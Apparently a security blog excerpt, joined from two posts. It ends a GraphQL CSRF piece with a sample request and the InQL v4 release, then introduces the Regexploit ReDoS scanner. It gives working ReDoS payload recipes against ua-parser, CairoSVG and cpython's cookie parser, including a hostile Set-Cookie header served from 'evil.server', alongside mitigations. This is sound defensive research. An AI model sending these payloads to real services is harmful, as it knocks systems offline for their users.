GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...
The implications of a successful XS-Search
attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.
As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.
For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.
InQL v4 can assist in detecting these issues:
By identifying various classes of CSRF through new “Send to Repeater” helpers:
GET
query parametersPOST
form-dataPOST
x-form-urlencodedBy improving the query generation
We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:
TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!
When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).
Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.
In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.
🚀 @doyensec/regexploit - pip install regexploit
and find some bugs.
To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:
(.+)\.(.+)\.(.+)
That will correctly process something like 123.456.789
, but it’s a pretty inefficient regex. How does the matching process work?
The first .+
capture group greedily matches all the way to the end of the string as dot matches every character.
$1="123.456.789"
.
The matcher then looks for a literal dot character.
Unable to find it, it tries removing one character at a time from the first .+
until it successfully matches a dot - $1="123.456"
The second capture group matches the final three digits $2="789"
, but we need another dot so it has to backtrack.
Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.
OK let’s try with $1="123"
, and let’s match group 2 greedily all the way to the end.
$2="456.789"
but now there’s no dot! That can’t be the correct group 2…
Finally we have a successful match: $1="123", $2="456", $3="789"
As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019.
In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, await
s, requests and responses until regex processing completes.
Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:
; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
If we look closer at the end part we can see three overlapping repeating groups:
\d+[^\);]+[^\);]*\)
Digit characters are matched by \d
and by [ˆ\);]
. If a string of N digits enters that section, there are ½(N-1)N
possible ways to split it up between the \d+
, [ˆ\);]+
and [ˆ\);]*
groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis.
The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a )
.
This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.
Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.
Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b
), but cubic complexity regexes (a+a+a+b
) can still be damaging.
Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts.
Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.
The regexploit
script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:
Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456
The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.
User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...
To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.
Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.
So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.
We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.
The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.
A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:
rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456
The developer wants to find strings like rgba( 100,200, 10, 0.5 )
and extract the middle part without surrounding spaces. Unfortunately, the .+
in the middle also accepts spaces.
If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n3) backtracking.
Let’s take a look at the matching process with the input "rgba(" + " " * 19
:
What a load of wasted CPU cycles!
A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:
Pattern: ^
(\d\d?) # day
(?:\s+|[-\/])
(\w+) # month
(?:\s+|[-\/])
(\d+) # year
(?:
(?:\s+|:) # separator before clock
(\d\d?):(\d\d) # hour:min
(?::(\d\d))? # optional seconds
)? # optional clock
\s*
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
\s*
(?:\(\w+\))? # ASCII representation of timezone in parens.
\s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'
It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT
, but with compatibility for some deprecated date formats.
The last 5 lines of the regex pattern contain three \s*
groups separated by optional groups, so we have a cubic ReDoS.
A victim simply making an HTTP request like requests.get('http://evil.server')
could be attacked by a remote server responding with Set-Cookie
headers of the form:
Set-Cookie: b;Expires=1-c-1 X
With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.
Again, the issue was designing the regex to handle whitespace between optional sections.
Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.
Sorry, I wanted to shoehorn this comic in somewhere
So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.
Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input.
There was a trade-off though.
Depending on your use-case, libraries like re2 may not be the fastest engines.
There are also some regex features such as backreferences which had to be dropped.
But in the pathological case, regexes won’t be what takes down your website.
There are re2 libraries for many languages, so you can use it in preference to Python’s re
module.
For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”.
While the http-cookie
gem has many more lines of code than a mega-regex, it avoids REDoS when parsing Set-Cookie
headers. Once each part of the string has been matched, it refuses to backtrack.
In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.